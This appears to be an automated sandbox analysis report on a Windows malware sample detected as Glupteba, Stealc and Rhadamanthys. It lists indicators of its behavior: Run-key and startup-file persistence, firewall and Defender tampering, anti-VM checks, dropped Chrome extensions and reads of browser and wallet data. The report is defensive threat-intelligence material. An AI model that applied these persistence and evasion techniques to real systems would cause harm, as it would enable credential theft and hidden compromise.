Analysis Overview
SHA256
627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3
Threat Level: Known bad
The file 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
Modifies firewall policy service
Windows security bypass
Suspicious use of NtCreateUserProcessOtherParentProcess
Stealc
Glupteba
Rhadamanthys
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
Detects executables containing artifacts associated with disabling Widnows Defender
Modifies boot configuration data using bcdedit
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.
Detects Windows executables referencing non-Windows User-Agents
Detects executables referencing many varying, potentially fake Windows User-Agents
Detects executables (downlaoders) containing URLs to raw contents of a paste
UPX dump on OEP (original entry point)
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Detects executables Discord URL observed in first stage droppers
Detect binaries embedding considerable number of MFA browser extension IDs.
Detects executables packed with Themida
Detects executables containing URLs to raw contents of a Github gist
Possible attempt to disable PatchGuard
Drops file in Drivers directory
Modifies Windows Firewall
Downloads MZ/PE file
Blocklisted process makes network request
Executes dropped EXE
Reads data files stored by FTP clients
UPX packed file
Reads user/profile data of web browsers
Loads dropped DLL
Windows security modification
Checks BIOS information in registry
Checks computer location settings
Drops startup file
Themida packer
Manipulates WinMon driver.
Looks up external IP address via web service
Manipulates WinMonFS driver.
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates connected drives
Drops desktop.ini file(s)
Checks whether UAC is enabled
Drops Chrome extension
Adds Run key to start application
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Uses Task Scheduler COM API
Runs ping.exe
Enumerates system info in registry
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-28 02:19
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-28 02:19
Reported
2024-03-28 02:21
Platform
win10v2004-20231215-en
Max time kernel
150s
Max time network
148s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
Rhadamanthys
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1108 created 2600 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\system32\sihost.exe |
Detect binaries embedding considerable number of MFA browser extension IDs.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Windows executables referencing non-Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables (downlaoders) containing URLs to raw contents of a paste
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables Discord URL observed in first stage droppers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables containing URLs to raw contents of a Github gist
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables containing artifacts associated with disabling Widnows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables packed with Themida
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many varying, potentially fake Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
UPX dump on OEP (original entry point)
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS882B.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\GJJottccSrZvHDi2rOc2biM9.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS882B.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OGw3iVRtVTorDTvrZWVFIRH3.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SrW2mPdLSg31OAH841w73qcw.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Pm05pTLuUdC7FMJ85g9crRy7.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jFDWS62MuE8dcLg86cb2VlF5.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wj1sBVa2SKVzIVUuIxyRFx1k.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ym0cIneygugXMnSzap6duAZS.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GBvKxHnoVQeTRn9daTavP9xw.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ycX4zOch6JksPqX8gcvOQIqE.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAyBqnC6d2btBn1GERznlHjO.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1Jj9NBgyCRfcZudsJjLMwpnm.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xecqa4DAy7lCYCKQpjOuHDrT.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS882B.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3300 set thread context of 1472 | N/A | C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe |
| PID 2244 set thread context of 1108 | N/A | C:\Users\Admin\Pictures\O0CPJ0FFbJ7m6QGvaPcCCRWK.exe | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
